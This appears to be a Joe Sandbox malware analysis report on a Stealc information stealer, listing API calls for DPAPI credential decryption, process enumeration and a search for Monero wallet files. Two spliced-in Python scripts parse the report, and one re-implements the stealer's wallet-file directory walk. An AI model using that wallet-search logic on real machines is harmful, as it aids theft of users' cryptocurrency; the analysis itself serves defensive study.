                            • Instruction ID: 2ac703b5c9357b42efaae56867ee4c41c163a8f4d94018f07eeae8ed2b64b290
                            • Opcode Fuzzy Hash: e0cf282e30779b72b22697b48149bc39262f3d099452ce0286a83b6e1e7cf194
                            • Instruction Fuzzy Hash: 14B23AF3A082049FE704AE2DDC8567AFBE5EF94720F1A8A3DEAC4C7744E53558058693
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: M~?$*5<$:%o~$B9?$E%4~$W[n$ft_
                            • API String ID: 0-1282150103
                            • Opcode ID: 7145d1413bb1853cbbf84af90762e7b546f60cbec85c52bbfa1ee4bb7ebc4bb5
                            • Instruction ID: a5af8239ad48a1ae44cd5502abfb3b6e5cf1bb660d72393c9c1057bcdf7822d0
                            • Opcode Fuzzy Hash: 7145d1413bb1853cbbf84af90762e7b546f60cbec85c52bbfa1ee4bb7ebc4bb5
                            • Instruction Fuzzy Hash: C89215F390C204AFE3046F29EC8567AFBE9EF94320F16892DEAC583744EA3558158757
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                              • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,006A0D73), ref: 0068E4A2
                            • StrCmpCA.SHLWAPI(?,006A14F8), ref: 0068E4F2
                            • StrCmpCA.SHLWAPI(?,006A14FC), ref: 0068E508
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0068EBDF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                            • String ID: \*.*
                            • API String ID: 433455689-1173974218
                            • Opcode ID: 7c2d8164f1e3646397350be9fc020df652dd3dfb62b6a361584a29807186697b
                            • Instruction ID: 2fba8e828b47acdb7e91d66067ae83d586f60ead7cb5997f52da0cab807e79d6
                            • Opcode Fuzzy Hash: 7c2d8164f1e3646397350be9fc020df652dd3dfb62b6a361584a29807186697b
                            • Instruction Fuzzy Hash: 38123F719201189ADF58FBA0DD96EED73BEAF54300F4041ACB50A96491EE306F49CFD6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 2I/$6r{$e ^$K]$P8w$Pv?
                            • API String ID: 0-3012428136
                            • Opcode ID: e4280b17f9b3a2d926fae64687f74b2e217bed882872de0a5918362961a62681
                            • Instruction ID: 0baf42b0ec0ea97af61c6aa0a790d6320380977f3c5b1ae62dd020614f87466b
                            • Opcode Fuzzy Hash: e4280b17f9b3a2d926fae64687f74b2e217bed882872de0a5918362961a62681
                            • Instruction Fuzzy Hash: 95B2E4F3A086049FE304AE2DEC8567ABBE9EF94320F1A493DE6C4C7744E63558058797
                            APIs
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nh,00000000,00000000), ref: 00689AEF
                            • LocalAlloc.KERNEL32(00000040,?,?,?,00684EEE,00000000,?), ref: 00689B01
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nh,00000000,00000000), ref: 00689B2A
                            • LocalFree.KERNEL32(?,?,?,?,00684EEE,00000000,?), ref: 00689B3F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptLocalString$AllocFree
                            • String ID: Nh
                            • API String ID: 4291131564-3382845309
                            • Opcode ID: 8335f3246915526a25bdfcc5ab385d56df2e52546049395a429bd0e8e5141240
                            • Instruction ID: 20b5681b6eb2cf211115ae8ff58317b9971f37c4ba18c10548f730eae0796ea6
                            • Opcode Fuzzy Hash: 8335f3246915526a25bdfcc5ab385d56df2e52546049395a429bd0e8e5141240
                            • Instruction Fuzzy Hash: 0111A2B4241208AFEB14CF64DC95FAA77B5FB89704F208158F9159B390C7B6A901CBA4
                            APIs
                            • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0068C871
                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0068C87C
                            • lstrcat.KERNEL32(?,006A0B46), ref: 0068C943
                            • lstrcat.KERNEL32(?,006A0B47), ref: 0068C957
                            • lstrcat.KERNEL32(?,006A0B4E), ref: 0068C978
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: lstrcat$BinaryCryptStringlstrlen
                            • String ID:
                            • API String ID: 189259977-0
                            • Opcode ID: f1543ffd164ce46de801106f797b5df6b705db821dbceb678f8720974cf0de18
                            • Instruction ID: 837309f0f2e35924cd5f5f432775ac67fe5d243e0e2659d5ef24ceeb92012344
                            • Opcode Fuzzy Hash: f1543ffd164ce46de801106f797b5df6b705db821dbceb678f8720974cf0de18
                            • Instruction Fuzzy Hash: 894180B590420EDBDB10DFA4DD89FFEB7B9BB48304F1042A8F509A6280D7715A84CFA1
                            APIs
                            • GetSystemTime.KERNEL32(?), ref: 0069696C
                            • sscanf.NTDLL ref: 00696999
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006969B2
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006969C0
                            • ExitProcess.KERNEL32 ref: 006969DA
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: Time$System$File$ExitProcesssscanf
                            • String ID:
                            • API String ID: 2533653975-0
                            • Opcode ID: dd8fd08e3bf29036c86b7a3cbee9ae25bf2f6a0e0d4030cef12e5d069409d944
                            • Instruction ID: 6e7cda5d7d101a214a419c072a7557b4499b51ecd7e3ef928c82740d747543b4
                            • Opcode Fuzzy Hash: dd8fd08e3bf29036c86b7a3cbee9ae25bf2f6a0e0d4030cef12e5d069409d944
                            • Instruction Fuzzy Hash: 4821BA75D1420DABCF48EFE4D9459EEB7BAFF48304F04852EE506A3250EB345605CBA9
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0068724D
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00687254
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00687281
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 006872A4
                            • LocalFree.KERNEL32(?), ref: 006872AE
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                            • String ID:
                            • API String ID: 2609814428-0
                            • Opcode ID: 6a4ab68042aaa7825253038fee844226ae2245f9a360a63c96b0e3efb9eeccd1
                            • Instruction ID: 56d658aa4a35a7408f40a0609756564fb7da6a1a03bdcf720c634ddbb690308a
                            • Opcode Fuzzy Hash: 6a4ab68042aaa7825253038fee844226ae2245f9a360a63c96b0e3efb9eeccd1
                            • Instruction Fuzzy Hash: 9B010CB5A40208BBEB14DFE4DD4AF9E77B9FB44B05F204155FB05AA2C0D6B0AA018B65
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0069961E
                            • Process32First.KERNEL32(006A0ACA,00000128), ref: 00699632
                            • Process32Next.KERNEL32(006A0ACA,00000128), ref: 00699647
                            • StrCmpCA.SHLWAPI(?,00000000), ref: 0069965C
                            • CloseHandle.KERNEL32(006A0ACA), ref: 0069967A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                            • String ID:
                            • API String ID: 420147892-0
                            • Opcode ID: d68793b03f40fa8bb2079b1683165a3639ffc8012501d23cbe74ba3a6d2d1baa
                            • Instruction ID: 4cf59cf971173e686d2d67d1e44692b91e5d194c06c9cac1f3c7731fda5348cc
                            • Opcode Fuzzy Hash: d68793b03f40fa8bb2079b1683165a3639ffc8012501d23cbe74ba3a6d2d1baa
                            • Instruction Fuzzy Hash: B7010C75A00208EBDF14DFA5DD48FEDBBF9FB48704F104198A905A6240D7349B41CF61
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 7,Sn$f)/t$jR?y$nR?y
                            • API String ID: 0-2573954225
                            • Opcode ID: dd30091c08af3a81568b655971b8269c5210e837d63e3d2d0b1bff602678eb59
                            • Instruction ID: 2fb30da963038e6873cd7aca42eba041b0e05696b05e849cf4842f3876a996ab
                            • Opcode Fuzzy Hash: dd30091c08af3a81568b655971b8269c5210e837d63e3d2d0b1bff602678eb59
                            • Instruction Fuzzy Hash: 37B207F3A0C6049FE704AE29DC8567AFBE9EF94720F16853DEAC483744EA3558018797
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: O4_w$Qm{o$Qm{o$c;v
                            • API String ID: 0-1201255392
                            • Opcode ID: 8a2b42e84f5bcbdea22eb19b18f88ccd392dcfd108ae61b93d5e0705b09c26f3
                            • Instruction ID: 5cde147c060fcca77d138b1205165fe67987a0a608d9db6f08c9e20528f252fd
                            • Opcode Fuzzy Hash: 8a2b42e84f5bcbdea22eb19b18f88ccd392dcfd108ae61b93d5e0705b09c26f3
                            • Instruction Fuzzy Hash: 48B2E5F360C2049FD304AE2DEC8567ABBE9EF94720F1A493DEAC4C3744EA3558458697
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: m_;$\`y&$a/=\$I7|
                            • API String ID: 0-91157766
                            • Opcode ID: 9de742c1e867aa7c099a414a0f0a01422906e050770c283d72466d7e80b70018
                            • Instruction ID: 5873a8f6903abd3d18b9b0e37faa2ba6c54b61912f5abf5be5db91523f6675a7
                            • Opcode Fuzzy Hash: 9de742c1e867aa7c099a414a0f0a01422906e050770c283d72466d7e80b70018
                            • Instruction Fuzzy Hash: 3192F5F360C604AFE304AE29EC8567AFBE5EF94320F16893DE6C487744EA3558058797
                            APIs
                            • CryptBinaryToStringA.CRYPT32(00000000,00685184,40000001,00000000,00000000,?,00685184), ref: 00698EC0
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptString
                            • String ID:
                            • API String ID: 80407269-0
                            • Opcode ID: cb028d8be11d2e1af350f668031803bb51d3a86a47b03597ac6a742e26e0b03b
                            • Instruction ID: 29265f49715db882b24fed8d7ff57a692e0bc4efee2fc3374089146fd189ace9
                            • Opcode Fuzzy Hash: cb028d8be11d2e1af350f668031803bb51d3a86a47b03597ac6a742e26e0b03b
                            • Instruction Fuzzy Hash: 8E110A70200208AFDF04CF64D884FA637BEBF8A354F109458F9158B650DB35E842DB60
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,013ADF78,00000000,?,006A0E10,00000000,?,00000000,00000000), ref: 00697A63
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00697A6A
                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,013ADF78,00000000,?,006A0E10,00000000,?,00000000,00000000,?), ref: 00697A7D
                            • wsprintfA.USER32 ref: 00697AB7
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                             • Associated: the remaining dump regions of the module based at 00680000, listed in full for the first function of this section
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                            • String ID:
                            • API String ID: 3317088062-0
                            • Opcode ID: b5b5dd5b0b3fe97adbfa5fc0eb830724f36b6e6392b5313b1ecffbb1f24ba6fc
                            • Instruction ID: 1f588666e0e7aa56844be5e551cbc3b63a1353ff86c9a833289ad805ac3e7c7d
                            • Opcode Fuzzy Hash: b5b5dd5b0b3fe97adbfa5fc0eb830724f36b6e6392b5313b1ecffbb1f24ba6fc
                            • Instruction Fuzzy Hash: C9118EB1945218EBEB248B54DC49FA9B7B8FB04721F1043AAE90A932C0C7745E40CF51
                            APIs
                            • CoCreateInstance.COMBASE(0069E118,00000000,00000001,0069E108,00000000), ref: 00693758
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 006937B0
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                             • Associated: the remaining dump regions of the module based at 00680000, listed in full for the first function of this section
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCreateInstanceMultiWide
                            • String ID:
                            • API String ID: 123533781-0
                            • Opcode ID: 85351b00c6201bff14bd830b0ac1531ec71ba7a1086dc264ffdf3033490ea05e
                            • Instruction ID: 0f4ef3e6fc49777d548ae1741628951cd4b0fe33815c94a35db031d025648049
                            • Opcode Fuzzy Hash: 85351b00c6201bff14bd830b0ac1531ec71ba7a1086dc264ffdf3033490ea05e
                            • Instruction Fuzzy Hash: F441D670A40A28AFDB24DB58CC95B9BB7B9BB48702F5041D8A609E72D0D7716E85CF50
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00689B84
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00689BA3
                            • LocalFree.KERNEL32(?), ref: 00689BD3
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                             • Associated: the remaining dump regions of the module based at 00680000, listed in full for the first function of this section
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$AllocCryptDataFreeUnprotect
                            • String ID:
                            • API String ID: 2068576380-0
                            • Opcode ID: 8ef156c0740839f5b970dbad34ec15cffd535b46524885d5177edfe48f23ed22
                            • Instruction ID: 7881f6d70de1a3ed84cd9b4b56519347bd8cbb494c47551e85891cb288dcdf39
                            • Opcode Fuzzy Hash: 8ef156c0740839f5b970dbad34ec15cffd535b46524885d5177edfe48f23ed22
                            • Instruction Fuzzy Hash: 4C11C9B8A00209EFDB04DF94D985EAEB7B5FF88304F1045A8E915A7350D774AE10CFA1
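                             The three function blocks above (CryptBinaryToStringA; GetProcessHeap/RtlAllocateHeap/GetTimeZoneInformation/wsprintfA; CryptUnprotectData/LocalAlloc/LocalFree) share one layout: API lines with module, arguments and call-site address, a Memory Dump Source line and the Similarity fields. The Python script below is an added example by the editor, not part of the Joe Sandbox report or of the Stealc sample. It parses that layout into records, decodes the dwFlags value 40000001 passed as the third argument to CryptBinaryToStringA with the wincrypt.h constants (CRYPT_STRING_BASE64 = 0x1, CRYPT_STRING_NOCRLF = 0x40000000), and tags every function with a capability label. The sample text is copied verbatim from the three blocks, with the section headers, Opcode/Instruction IDs and the repeated Associated lines left out; the capability labels, the regular expressions and all helper names are the editor's own.

```python
"""Parse Joe Sandbox per-function blocks (API lines, Memory Dump Source,
Similarity fields) into records and tag each with a capability label.

Added example by the editor, not part of the Joe Sandbox report. SAMPLE is
copied from the function blocks above; headers and "Associated:" lines are
omitted because the parser does not need them."""
import re

SAMPLE = r"""
• CryptBinaryToStringA.CRYPT32(00000000,00685184,40000001,00000000,00000000,?,00685184), ref: 00698EC0
• Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
• API ID: BinaryCryptString
• Instruction Fuzzy Hash: 8E110A70200208AFDF04CF64D884FA637BEBF8A354F109458F9158B650DB35E842DB60
• GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,013ADF78,00000000,?,006A0E10,00000000,?,00000000,00000000), ref: 00697A63
• RtlAllocateHeap.NTDLL(00000000), ref: 00697A6A
• GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,013ADF78,00000000,?,006A0E10,00000000,?,00000000,00000000,?), ref: 00697A7D
• wsprintfA.USER32 ref: 00697AB7
• Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
• API ID: Heap$AllocateInformationProcessTimeZonewsprintf
• Instruction Fuzzy Hash: C9118EB1945218EBEB248B54DC49FA9B7B8FB04721F1043AAE90A932C0C7745E40CF51
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00689B84
• LocalAlloc.KERNEL32(00000040,00000000), ref: 00689BA3
• LocalFree.KERNEL32(?), ref: 00689BD3
• Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
• API ID: Local$AllocCryptDataFreeUnprotect
• Instruction Fuzzy Hash: 4C11C9B8A00209EFDB04DF94D985EAEB7B5FF88304F1045A8E915A7350D774AE10CFA1
"""

# Matches "• Name.MODULE(args), ref: ADDR", "• Name.MODULE ref: ADDR" (the
# form wsprintfA is printed in) and the indented "Part of subcall function
# ADDR: Name.MODULE(...)" lines that list a callee's own API calls.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")


def _new():
    return {"apis": [], "source_file": None, "image_base": None, "fields": {}}


def parse_blocks(text):
    """One dict per function. A block is closed by its 'Instruction Fuzzy
    Hash' line, the last field Joe Sandbox prints for a function."""
    records, cur = [], _new()
    for raw in text.splitlines():
        line = raw.strip()
        m = API_RE.match(line)
        if m:
            cur["apis"].append({
                "name": m["name"], "module": m["mod"], "ref": int(m["ref"], 16),
                "args": m["args"].split(",") if m["args"] else [],
                "subcall": int(m["sub"], 16) if m["sub"] else None})
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, val = m["key"].strip(), m["val"].strip()
        if key == "Source File":  # "<dump>.sdmp, Offset: 00680000, based on PE: true"
            dump, _, rest = val.partition(", Offset: ")
            cur["source_file"], cur["image_base"] = dump, int(rest.split(",")[0], 16)
        else:
            cur["fields"][key] = val
        if key == "Instruction Fuzzy Hash":
            records.append(cur)
            cur = _new()
    return records


def crypt_string_format(args):
    """Decode CryptBinaryToString's dwFlags (3rd argument) with the wincrypt.h
    values: the low word selects the format, the high bits suppress line breaks."""
    try:
        flags = int(args[2], 16)
    except (IndexError, ValueError):
        return "unknown"
    fmt = {0x0: "BASE64HEADER", 0x1: "BASE64", 0x4: "HEX"}.get(
        flags & 0xFFFF, f"fmt_{flags & 0xFFFF:#x}")
    if flags & 0x40000000:
        fmt += "|NOCRLF"
    if flags & 0x80000000:
        fmt += "|NOCR"
    return fmt


# Editor's own labels for what the documented Win32 calls do.
CAPABILITIES = [
    ({"CryptUnprotectData"}, "DPAPI unprotect of a CryptProtectData blob"),
    ({"GetTimeZoneInformation"}, "time-zone fingerprint of the host"),
    ({"FindFirstFileA", "FindNextFileA"}, "directory enumeration"),
    ({"CoCreateInstance"}, "COM object instantiation"),
]


def tag(record):
    """Capability labels derived only from the API names and the literal
    arguments printed in the report."""
    names = {a["name"] for a in record["apis"]}
    labels = [label for need, label in CAPABILITIES if need <= names]
    for a in record["apis"]:
        if a["name"] == "CryptBinaryToStringA":
            labels.append("binary-to-text encoding: " + crypt_string_format(a["args"]))
        for arg in a["args"]:
            if "wallet" in arg.lower():  # e.g. \Monero\wallet.keys in the lstrlen call
                labels.append("references wallet file " + arg)
    return labels


if __name__ == "__main__":
    for rec in parse_blocks(SAMPLE):
        print(f"{rec['apis'][0]['ref']:#010x} {rec['fields'].get('API ID')}: {tag(rec)}")
```

                             Feed it the whole report text and the tags give a quick capability inventory per function; the decoded dwFlags shows that the CryptBinaryToStringA call at 00698EC0 produces single-line base64, which is what to expect in the C2 traffic.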
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                             • Associated: the remaining dump regions of the module based at 00680000, listed in full for the first function of this section
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: [W=$md}v
                            • API String ID: 0-3924545739
                            • Opcode ID: 659f45ad4dc986f69a964a4a33e6f746a99fc71e65d2ef343bbb962d8c1a542b
                            • Instruction ID: 07a70dd4982e152df41578a7e775763e91150592d23b770e8bf18aa355aaa6d9
                            • Opcode Fuzzy Hash: 659f45ad4dc986f69a964a4a33e6f746a99fc71e65d2ef343bbb962d8c1a542b
                            • Instruction Fuzzy Hash: 8A62E3F2A0C2009FD3046F19EC85A7EFBE5EF94720F16892DEAC487344E63598558B97
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                              • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006A15B8,006A0D96), ref: 0068F71E
                            • StrCmpCA.SHLWAPI(?,006A15BC), ref: 0068F76F
                            • StrCmpCA.SHLWAPI(?,006A15C0), ref: 0068F785
                            • FindNextFileA.KERNEL32(000000FF,?), ref: 0068FAB1
                            • FindClose.KERNEL32(000000FF), ref: 0068FAC3
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                             • Associated: the remaining dump regions of the module based at 00680000, listed in full for the first function of this section
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                            • String ID:
                            • API String ID: 3334442632-0
                            • Opcode ID: 4c9acf4c4317e9ed69ce14a9e85261229271d8b3c3750f53d88857ef31d90ce1
                            • Instruction ID: cb2b65b91dae71638e85ed443c20a2c87026f3552a70943215d060e938b87e7f
                            • Opcode Fuzzy Hash: 4c9acf4c4317e9ed69ce14a9e85261229271d8b3c3750f53d88857ef31d90ce1
                            • Instruction Fuzzy Hash: E811727181011D9BDF54FBE0DD569ED73BEAF11300F4042ADA51A56892EF302B4ACBD6
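                             The lstrcpy/lstrcat, FindFirstFileA, two StrCmpCA, FindNextFileA, FindClose sequence above, with \Monero\wallet.keys passed to lstrlen in one of the callees, has the shape of a recursive directory walk that looks for a fixed file path. The Python below re-implements that walk so a target list can be checked against any directory tree, for instance to see what such a function would collect from a given user profile. It is an added example by the editor, not code from the sample or from Joe Sandbox. Assumptions: the two StrCmpCA calls compare each entry against "." and ".." (their string operands at 006A15BC and 006A15C0 are not printed on the page), name comparison is case-insensitive as on NTFS, and the tree it scans is constructed in a temporary directory.

```python
"""Python re-implementation of the FindFirstFileA / StrCmpCA / FindNextFileA /
FindClose walk seen in the function above. Added example by the editor; the
sample tree is constructed here and the only target taken from the report is
\\Monero\\wallet.keys."""
import os
import tempfile

# Root-relative suffixes the walker looks for. Only the Monero entry appears
# in this report; pass a longer list to check other paths.
TARGETS = [r"\Monero\wallet.keys"]


def _norm(p):
    """Windows-style comparison form: backslashes, lower case, no outer slashes."""
    return p.replace("/", "\\").lower().strip("\\")


def find_targets(root, targets=TARGETS):
    """Walk `root` the way the FindFirstFileA/FindNextFileA loop does: list
    '<dir>\\*', skip the '.' and '..' entries (the two StrCmpCA calls,
    assumed), recurse into sub-directories, and report files whose path ends
    with one of the target suffixes. Returns sorted root-relative paths."""
    wanted = [_norm(t) for t in targets]
    hits, stack = [], [root]
    while stack:
        directory = stack.pop()
        # os.listdir never yields '.' or '..', but FindNextFileA does, so the
        # filter is kept to mirror the original loop.
        for name in sorted(os.listdir(directory)):
            if name in (".", ".."):
                continue
            full = os.path.join(directory, name)
            if os.path.isdir(full):
                stack.append(full)
                continue
            rel = _norm(os.path.relpath(full, root))
            if any(rel == w or rel.endswith("\\" + w) for w in wanted):
                hits.append(rel)
    return sorted(hits)


def build_sample_tree():
    """Constructed profile directory for the demonstration (not real data)."""
    root = tempfile.mkdtemp(prefix="stealc_walk_")
    layout = {
        "Documents/Monero/wallet.keys": b"constructed sample, not a real wallet",
        "Documents/Monero/notes.txt": b"not a target",
        "AppData/Roaming/Other/wallet.keys": b"same file name, different parent",
    }
    for rel, data in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for hit in find_targets(sample_root):
        print("would be collected:", hit)
```

                             The suffix match matters: a file named wallet.keys under a different parent directory is not reported, which is the behaviour the fixed \Monero\wallet.keys string implies.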
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                             • Associated: the remaining dump regions of the module based at 00680000, listed in full for the first function of this section
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ;XD
                            • API String ID: 0-268549291
                            • Opcode ID: 65493e02e7e6de7d4a03a8781815c5a544fb10a153c8555e53ad56776341f95a
                            • Instruction ID: 6a20ccd79848a368a2ad2b525a7a2beafcf21e0c80cfb1fa39cefbed749fbfbb
                            • Opcode Fuzzy Hash: 65493e02e7e6de7d4a03a8781815c5a544fb10a153c8555e53ad56776341f95a
                            • Instruction Fuzzy Hash: A681A0B3E182109FE3486A2DD85573AFBE5EB84720F17893DE9D9D3384E9395C408786
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                             • Associated: the remaining dump regions of the module based at 00680000, listed in full for the first function of this section
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: h[[
                            • API String ID: 0-3531621366
                            • Opcode ID: 5a0ea0c3ec9242d3b3e1ea53ed720d1f9efae8b043be22b0316397f1f393c5db
                            • Instruction ID: 3afa04f056061a66f28df79d02d190c40ab04d2ea44471bbe0ea1df416c669b9
                            • Opcode Fuzzy Hash: 5a0ea0c3ec9242d3b3e1ea53ed720d1f9efae8b043be22b0316397f1f393c5db
                            • Instruction Fuzzy Hash: 3641F6F3B052004BF308A93DDD9837AB6D79BD4311F2B853D9BC8977C4E93948094685
                            Memory Dump Source
                            • Source File: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                             • Associated: the remaining dump regions of the module based at 00680000, listed in full for the first function of this section
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
